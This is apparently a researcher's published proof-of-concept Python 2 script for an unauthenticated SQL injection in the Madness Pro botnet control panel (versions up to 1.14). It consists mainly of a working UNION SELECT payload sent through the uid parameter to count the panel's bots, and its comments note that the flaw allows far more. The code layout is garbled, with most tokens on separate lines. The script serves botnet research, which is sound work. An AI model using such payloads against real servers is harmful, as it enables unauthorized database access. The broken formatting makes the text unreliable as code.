#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# Exploit Title: Madness Pro <= 1.14 SQL injection
# Date: June 05, 2014
# Exploit Author: @botnet_hunter
# Version: 1.14
# Tested on: Apache2 - Ubuntu - MySQL
# ▄▄▌ ▄▄▄▄· ▄▄▄▄▄ • ▌ ▄ ·. ▄· ▄▌
# ██• ▪ ▐█ ▀█▪▪ •██ ▪ ·██ ▐███▪▐█▪██▌
# ██▪ ▄█▀▄ ▐█▀▀█▄ ▄█▀▄ ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▐█▌▐█▪
# ▐█▌▐▌▐█▌.▐▌██▄▪▐█▐█▌.▐▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌ ▐█▀·.
# .▀▀▀ ▀█▄▀▪·▀▀▀▀ ▀█▄▀▪ ▀▀▀ ▀█▄▀▪▀▀ █▪▀▀▀ ▀ •
# ▄▄· ▄• ▄▌▄▄▄ ▪ ▐ ▄ ▄▄ • • ▌ ▄ ·. ▄▄▄· ·▄▄▄▄ ▐ ▄ ▄▄▄ ..▄▄ · .▄▄ ·
# ▐█ ▌▪█▪██▌▀▄ █·██ •█▌▐█▐█ ▀ ▪ ·██ ▐███▪▐█ ▀█ ██▪ ██ •█▌▐█▀▄.▀·▐█ ▀. ▐█ ▀.
# ██ ▄▄█▌▐█▌▐▀▀▄ ▐█·▐█▐▐▌▄█ ▀█▄ ▐█ ▌▐▌▐█·▄█▀▀█ ▐█· ▐█▌▐█▐▐▌▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄
# ▐███▌▐█▄█▌▐█•█▌▐█▌██▐█▌▐█▄▪▐█ ██ ██▌▐█▌▐█ ▪▐▌██. ██ ██▐█▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█
# ·▀▀▀ ▀▀▀ .▀ ▀▀▀▀▀▀ █▪·▀▀▀▀ ▀▀ █▪▀▀▀ ▀ ▀ ▀▀▀▀▀• ▀▀ █▪ ▀▀▀ ▀▀▀▀ ▀▀▀▀
#
# Unauthenticated SQL injection in Madness Pro panel <= 1.14
# Proof of Concept retrieves a count of the bots, although it can be utilized for far more
# Discovered and developed by bwall @botnet_hunter
#
# References:
# http://blog.cylance.com/a-study-in-bots-lobotomy
#
import
urllib
# Fill in URL that Madness Pro bot connects back to
panel_url
=
""
def
run_sqli_proof_of_concept(panel_index_url):
f
=
urllib.urlopen(
"{0}?uid='%20OR%201=2%20UNION%20ALL%20SELECT%201,1,1,CONCAT('bot-count:',COUNT(*))%20FROM%20bots"
"%20--%20--"
.
format
(panel_index_url))
print
f.read()
run_sqli_proof_of_concept(panel_url)